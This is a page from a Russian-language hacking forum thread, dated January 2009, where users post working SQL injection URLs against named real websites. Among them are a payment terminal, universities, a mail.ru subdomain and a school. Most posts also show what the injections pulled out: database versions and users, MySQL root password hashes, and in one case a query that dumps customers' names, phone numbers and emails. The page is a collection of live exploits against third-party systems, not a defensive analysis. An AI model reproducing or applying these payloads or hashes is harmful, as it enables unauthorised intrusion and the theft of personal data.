ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7561  
Старый 26.01.2009, 20:05
Аватар для re-2
re-2
Новичок
Регистрация: 24.06.2007
Сообщений: 5
Провел на форуме:
487247

Репутация: 3
По умолчанию

http://www.greitipasimatymai.lt/index.php?act=ShowForumMessage&id=-326+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user()),13,14,15,16,17, 18,19,20,21,22--

5.0.67-community-log
elita_gp3
elita_gp3@localhost

кто наидиот больше в pm

Последний раз редактировалось re-2; 26.01.2009 в 20:15..
 
Ответить с цитированием

  #7562  
Старый 26.01.2009, 20:36
Аватар для Мcтитель
Мcтитель
Banned
Регистрация: 26.01.2009
Сообщений: 1
Провел на форуме:
44668

Репутация: 0
По умолчанию

http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select %200,1,user(),3,4,5--
http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select %200,1,version(),3,4,5-- (V 4 )

Последний раз редактировалось jokester; 26.01.2009 в 21:34.. Причина: Убрал непонятно что
 
Ответить с цитированием

  #7563  
Старый 26.01.2009, 20:46
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ejante.ro/?x=arata_produs&id_p=-2319+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),d atabase(),user()),5,6,7,8/*

Database Version: 4.1.22-standard-log
Database name: ejantero_ejante
User name: ejantero_jante@localhost
 
Ответить с цитированием

Платежный терминал www.krasplat.ru
  #7564  
Старый 26.01.2009, 20:55
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию Платежный терминал www.krasplat.ru

Вот скуля на платёжном терминале:
Код:
http://www.krasplat.ru/about/stock/?id=199'
5-тая версия мускула.
Все таблици:
Код:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,faq,plat_action,plat_cache,plat_doc,plat_img,plat_news,plat_page,plat_partner,plat_registration,plat_terminal,stat,vote,votevar
Код:
http://www.krasplat.ru/about/stock/?id=199+union+select+1,2,group_concat(concat_ws(0x3a,id,name_l,name_f,name_m,ybday,address,mobile,email,home,subscribe,active)),4,5+from+plat_registration--
Получаем имена, номера телефонов, мыльники и т.п.
File_priv по видимому N =(
-----------------------------------------------------------
The End!
 
Ответить с цитированием

  #7565  
Старый 27.01.2009, 00:07
Аватар для VITАL
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077

Репутация: 93
По умолчанию

поддомен MAIL.RU hacked by VITAL
Цитата:
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=-27+union+select+1,2,3,4,0x3C4D4152515545453E73716C 2D696E6A20FDF2EE20EAF3EBFC3C2F4D4152515545453E,6,7 ,8,9,10/*
Swiatroweru.com.pl
Цитата:
http://www.swiatroweru.com.pl/item.php?show=product&pid=-2917+union+select+1,2,3,4,5,6--
Avtodiagnostika.ru
Цитата:
http://www.avtodiagnostika.ru/modules/wfsection/print.php?articleid=-57+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
Shogunclub.ru
Цитата:
http://www.shogunclub.ru/kendo.php?ArticleID=-5+union+select+1,2,3,4,5,6,concat_ws(0x3a,member_l ogin_key),8,9,10+from+u53265.ibf_members+where+nam e=0x5a7978--
форум.. пассы не рахешил, а так же /restricted.php - пассы не канают..

здесь MS Access, нужно подбирать таблицу наугад
Цитата:
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2 ,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+FROM+%60MSysO bjects%60%00&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg 0.asp
доступа к MSysObjects нет
 
Ответить с цитированием

  #7566  
Старый 27.01.2009, 01:36
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR6
Цитата:
http://my.ccuniversity.edu/Library/index.php?ID=-99999+union+select+1,concat_ws(0x3a,user,password) ,3+from+mysql.user/*
Database Version: 5.0.37-community-nt
Database name: library
User name: root@localhost

root:*B54F877315A6A555E448A34722AFEE6370D6877D

_____________________________
PR6
Цитата:
https://ssl.alaskapacific.edu/pr/archives.php?id=-9999+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8/*
Database Version: 4.0.23a
Database name: news
User name: news@localhost

_____________________________
PR6
Цитата:
http://www.vfcc.edu/prospectivestudents/printversion.php?id=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,version(),database()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*
Database Version: 4.1.20
Database name: vfcc
User name: vfcc@localhost

Последний раз редактировалось beerhack; 27.01.2009 в 02:53..
 
Ответить с цитированием

  #7567  
Старый 27.01.2009, 03:19
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.38school.ru
http://www.38school.ru/arch.php?id=-7+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5--
бд - seopro_box-school
версия - 5.0.22
юзер - box-school@localhost
 
Ответить с цитированием

  #7568  
Старый 27.01.2009, 03:20
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://sils.unc.edu/news/calendar/calendar.php?display=event&id=-285+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12/*
songphan@snoopy.ils.unc.edu
4.1.22
silscalendar
 
Ответить с цитированием

  #7569  
Старый 27.01.2009, 14:50
Аватар для [AVT]
[AVT]
Новичок
Регистрация: 20.12.2007
Сообщений: 19
Провел на форуме:
373780

Репутация: 52
По умолчанию

Знаменитая биржа Textsale.ru
Цитата:
http://www.youtext.ru/index.php5?c=-1+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Движок на домене youtext.ru подключен к базе Textsale.ru, но в отличии от этого фильтров не имеет.

loveumru_textsal@localhost
4.1.22-lk-log
loveumru_textsal
 
Ответить с цитированием

  #7570  
Старый 27.01.2009, 18:45
Аватар для Maestus
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию

acmcoimbra.pt/
Цитата:
http://www.acmcoimbra.pt/html/infos.php?id=47+UNION+SELECT+1,2,3,4,5,6,concat_ws (0x20,user,password,user(),database(),version()),8 ,9+FROM+mysql.user+LIMIT+1,1
user: root
password ( mySql 5.x hash):*1D8BF671675E9DACA624D175B99816335CFE137C

user: farinhasilva@cl-t128-330cl.privatedns.com
version: 5.0.32-Debian_7etch6-log
database: acm

ufacatalog.ru/
Цитата:
http://www.ufacatalog.ru/company/?id=-94+union+select+1,concat_ws(0x20,user(),@@version, database()),3,4,5,6,7,8,9,10,11,12,13--
user: user6@localhost
database:db6
version:4.0.27-standard-log

Последний раз редактировалось jokester; 27.01.2009 в 19:40.. Причина: australbrick.com.au боян
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ